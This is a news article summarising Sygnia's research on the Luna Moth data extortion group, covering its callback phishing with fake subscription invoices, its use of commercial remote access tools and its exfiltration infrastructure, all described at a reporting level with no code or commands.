Companies have been breached by a new data extortion group that demands a ransom for not releasing the stolen data to the public. Since March, the group known as Luna Moth has been active in phishing efforts that supply remote access tools (RAT) that facilitate corporate data theft.

PHISHING ATTACK

Sygnia's Incident Response team has been monitoring the activities of the Luna Moth ransomware group, observing that the actor is attempting to develop a reputation using the name Silent Ransom Group (SRG).

In a report published earlier this month, Sygnia asserts that Luna Moth's (also monitored as TG2729) method of operation matches that of a con artist. The focus is, however, on gaining access to sensitive information.

To accomplish this, Luna Moth employs phishing assaults. Over the past three months, the organization has orchestrated a large-scale campaign consisting of bogus subscription emails for Zoho, MasterClass, and Duolingo.

The victims will supposedly receive a notification from one of the aforementioned services informing them that their subscription is about to expire and will be automatically renewed within 24 hours to execute the payment.

Luna Moth employs email addresses that imitate the brands targeted by the phishing campaign. The fact that the emails are sent from Gmail accounts makes the fraud evident.

Attached to the email is a fake invoice with contact information for anyone who wishes to learn more about their subscription or cancel it.

Calling the phone number on the invoice connects the victim to the con artist, who instructs them to install a remote access tool on their system.

TOOLS & TECHNIQUES

Luna Moth is not a sophisticated threat actor, as evidenced by their mode of operation, and the tools they employ confirm this idea.

According to Sygnia, the gang uses remote desktop technologies such as Atera, AnyDesk, Synchro, and Splashtop that are commercially available.

According to the researchers, in many detected attacks, threat actors installed multiple RATs on the victim's workstation for redundancy and persistence.

Other tools manually installed by threat actors include SoftPerfect Network Scanner, SharpShares, and Rclone, which collectively provide adversaries with network reconnaissance to find valuable files, pivot, and steal data.

In prior attacks, these techniques were utilized by fraudsters who duped victims with bogus emails purporting to renew their antivirus subscriptions.

According to Sygnia, threat actors do not target specific victims. They deploy opportunistic attacks in which they seize whatever they can get their hands on and then extort the victim.

However, the threat actor's demands are pretty high, as analysts estimate that Luna Moth may seek "millions of dollars in ransom."

DOMAINS APPEAR TO BE THE MAIN VECTOR OF ATTACK

Despite a lack of sophistication, Sygnia discovered that Luna Moth utilized approximately 90 domain names as part of their infrastructure or for hosting hacked company data.

More than 40 phishing websites with names resembling the impersonated brand - in this example, Zoho, MasterClass, and Duolingo - were discovered by researchers. The remaining servers were used for exfiltration.

While extortion is commonly linked with ransomware operations, stealing sensitive data without encrypting systems is becoming a new method of monetizing corporate breaches.

Karakurt is another data extortion outfit that analysts have linked to the recent shutdown of Conti ransomware.